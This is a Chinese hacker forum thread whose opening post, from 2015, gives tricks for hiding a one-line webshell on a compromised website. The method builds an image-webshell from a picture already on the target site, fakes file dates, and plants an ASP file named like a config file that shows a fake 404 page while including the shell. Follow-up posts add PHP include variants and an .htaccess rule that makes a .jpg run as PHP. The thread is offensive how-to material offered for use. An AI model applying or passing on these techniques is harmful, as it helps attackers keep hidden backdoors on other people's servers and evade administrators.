查看: 82586|回复: 158

[源码专区] 我隐藏一句话木马的一些小技巧

[复制链接]
  • TA的每日心情

    2015-8-14 20:30
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2015-4-23 17:09:06 | 显示全部楼层 |阅读模式
    拿asp举例,  先用copy命令创建一个图片一句话马,图片选用目标网站里面本来就有的图,便于伪装。 创建到图片文件夹里面,比如 uploadfiles/20140915130615.jpg  再修改一下文件日期。

    然后在其他目录里面 创建一个asp文件,名字改成类似网站配置文件名, 也修改文件日期。

    在文件里插入 这行代码。   <!--#include file="这里写图片马的路径"-->  
    下面的是伪装页面代码。
    [HTML] 纯文本查看 复制代码
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312"/>
    <title>404 - 找不到文件或目录。</title>
    <style type="text/css">
    <!--
    body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
    fieldset{padding:0 15px 10px 15px;} 
    h1{font-size:2.4em;margin:0;color:#FFF;}
    h2{font-size:1.7em;margin:0;color:#CC0000;} 
    h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
    #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
    background-color:#555555;}
    #content{margin:0 0 0 2%;position:relative;}
    .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
    -->
    </style>
    </head>
    <body>
    <div id="header"><h1>服务器错误</h1></div>
    <div id="content">
     <div class="content-container"><fieldset>
      <h2>404 - 找不到文件或目录。</h2>
      <h3>您要查找的资源可能已被删除,已更改名称或者暂时不可用。</h3>
     </fieldset></div>
    </div>
    </body>
    </html>



    这样就比较隐蔽了。 asp外面看到是404,图片马外面看到的是正常图片。
    可以蒙混过很多粗心的管理员。
    回复

    使用道具 举报

  • TA的每日心情

    2015-8-14 20:30
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2015-4-23 17:14:28 | 显示全部楼层
    本帖最后由 蟹老板 于 2015-4-23 17:17 编辑

    图片可以替换网站原有的, 一句话可以选择变种的,难以辨别的。
    #include file 可以试着插入网站原有文件,但不影响网站使用的。比如一些没用的asp文件里面。


    php 的语法是
    [AppleScript] 纯文本查看 复制代码
    <?php require_once ("伪装马.jpg"); ?> 
    
    或者
    <?php
    include('伪装马.jpg');
    ?>
    
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2016-3-22 14:15
  • 签到天数: 95 天

    [LV.6]常住居民II

    发表于 2015-4-23 23:50:28 | 显示全部楼层
    你的后门有我的猥琐?
    <FilesMatch "20151111.jpg">

    SetHandler application/x-httpd-php

    </FilesMatch>

    点评

    哈哈, 我也是抛砖引玉嘛,把大家的奇巧淫技都收藏一下。  详情 回复 发表于 2015-4-24 11:07
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-8-14 20:30
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2015-4-24 11:07:12 | 显示全部楼层
    这盐有点咸 发表于 2015-4-23 23:50
    你的后门有我的猥琐?

    哈哈, 我也是抛砖引玉嘛,把大家的奇巧淫技都收藏一下。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-4 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2015-6-27 22:36:21 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-6-28 04:24:22 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 10:18:14 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 07:02:20 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 18:08:03 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 13:30:54 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 21:21 , Processed in 0.031379 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部